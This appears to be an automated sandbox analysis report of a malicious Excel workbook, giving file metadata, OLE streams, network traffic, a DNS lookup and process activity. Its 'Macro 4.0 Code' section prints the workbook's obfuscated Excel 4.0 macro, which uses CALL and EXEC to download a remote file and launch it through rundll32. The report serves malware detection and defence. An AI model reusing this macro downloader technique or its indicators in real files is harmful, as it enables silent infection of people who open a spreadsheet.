                      SSDEEP:1536:fEcKoSsxz1PDZLDZjlbR868O8KlVH347uDphYHceXVhca+fMHLtyeGxcl8O9pTIQ:fEcKoSsxzNDZLDZjlbR868O8KlVH347d
                      File Content Preview:........................>......................................................................................................................................................................................................................................

                      File Icon

                      Icon Hash:e4eea286a4b4bcb4

                      Static OLE Info

                      General

                      Document Type:OLE
                      Number of OLE Files:1

                      OLE File "document-1019153116.xls"

                      Indicators

                      Has Summary Info:True
                      Application Name:Microsoft Excel
                      Encrypted Document:False
                      Contains Word Document Stream:False
                      Contains Workbook/Book Stream:True
                      Contains PowerPoint Document Stream:False
                      Contains Visio Document Stream:False
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:True

                      Summary

                      Code Page:1251
                      Author:
                      Last Saved By:
                      Create Time:2006-09-16 00:00:00
                      Last Saved Time:2021-02-19 09:21:15
                      Creating Application:Microsoft Excel
                      Security:0

                      Document Summary

                      Document Code Page:1251
                      Thumbnail Scaling Desired:False
                      Contains Dirty Links:False
                      Shared Document:False
                      Changed Hyperlinks:False
                      Application Version:917504

                      Streams

                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                      General
                      Stream Path:\x5DocumentSummaryInformation
                      File Type:data
                      Stream Size:4096
                      Entropy:0.318330155209
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 2 . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 9f 00 00 00 02 00 00 00 e3 04 00 00
                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                      General
                      Stream Path:\x5SummaryInformation
                      File Type:data
                      Stream Size:4096
                      Entropy:0.257042036969
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . w P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 80660
                      General
                      Stream Path:Workbook
                      File Type:Applesoft BASIC program data, first line number 16
                      Stream Size:80660
                      Entropy:3.64568130994
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                      Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                      Macro 4.0 Code

                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REPLACE(Doc2!AL21,7,7,Doc2!AM14)",,,,,,,,,,,,,"=REPLACE(Doc2!AL25,7,7,"""")",,,,,,,,,,,,,=before.2.6.28.sheet!AF14(),,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(Doc2!AL27&""2 "",AD15)","=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(Doc2!AM27,AE15)","=FORMULA(Doc2!AK22&Doc2!AK23&Doc2!AK24&Doc2!AK25&Doc2!AK26&Doc2!AK27,AF15)",,,,,,,,,,,rundll32 ,",DllR",,,,,,,,,,,,=AE14(),=before.2.6.28.sheet!AJ11(),=AG24(),,,,,,,,=before.2.6.28.sheet!AK28(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(AF15,before.2.6.28.sheet!AJ12&before.2.6.28.sheet!AJ11&AG25&""A"",""JJC""&""CBB"",0,Doc2!AA100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&Doc2!AM16,0)",,,,,,,,,,,,,=AN16(),,,,,,,,,"=REPLACE(Doc2!AM11,6,1,Doc2!AM12)",,,,,,,,,,,,,"=REPLACE(Doc2!AL20,6,1,before.2.6.28.sheet!AL12)",,,,,,,,,,,,,=AK22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(before.2.6.28.sheet!AD15&Doc2!AM16&before.2.6.28.sheet!AE15&AG24)",,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Feb 22, 2021 09:08:42.939394951 CET49167443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.007725954 CET44349167195.74.38.127192.168.2.22
                      Feb 22, 2021 09:08:43.007853031 CET49167443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.025496960 CET49167443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.092170954 CET44349167195.74.38.127192.168.2.22
                      Feb 22, 2021 09:08:43.092192888 CET44349167195.74.38.127192.168.2.22
                      Feb 22, 2021 09:08:43.092308998 CET49167443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.093262911 CET49167443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.094603062 CET49168443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.159329891 CET44349167195.74.38.127192.168.2.22
                      Feb 22, 2021 09:08:43.160475969 CET44349168195.74.38.127192.168.2.22
                      Feb 22, 2021 09:08:43.160562038 CET49168443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.165435076 CET49168443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.229302883 CET44349168195.74.38.127192.168.2.22
                      Feb 22, 2021 09:08:43.229334116 CET44349168195.74.38.127192.168.2.22
                      Feb 22, 2021 09:08:43.229525089 CET49168443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.230047941 CET49168443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.231520891 CET49169443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.298122883 CET44349168195.74.38.127192.168.2.22
                      Feb 22, 2021 09:08:43.299741030 CET44349169195.74.38.127192.168.2.22
                      Feb 22, 2021 09:08:43.299828053 CET49169443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.300626993 CET49169443192.168.2.22195.74.38.127
                      Feb 22, 2021 09:08:43.368030071 CET44349169195.74.38.127192.168.2.22
                      Feb 22, 2021 09:08:43.368251085 CET49169443192.168.2.22195.74.38.127

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Feb 22, 2021 09:08:42.839735985 CET5219753192.168.2.228.8.8.8
                      Feb 22, 2021 09:08:42.927159071 CET53521978.8.8.8192.168.2.22

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Feb 22, 2021 09:08:42.839735985 CET192.168.2.228.8.8.80xbf29Standard query (0)marknadsundersokning.nuA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Feb 22, 2021 09:08:42.927159071 CET8.8.8.8192.168.2.220xbf29No error (0)marknadsundersokning.nu195.74.38.127A (IP address)IN (0x0001)

                      Code Manipulations

                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Start time:09:08:40
                      Start date:22/02/2021
                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Imagebase:0x13f0a0000
                      File size:27641504 bytes
                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:09:08:43
                      Start date:22/02/2021
                      Path:C:\Windows\System32\rundll32.exe
                      Wow64 process (32bit):false
                      Commandline:rundll32 ..\iopjvdf.vock,DllRegisterServer
                      Imagebase:0xff4b0000
                      File size:45568 bytes
                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      Code Analysis

                      Reset < >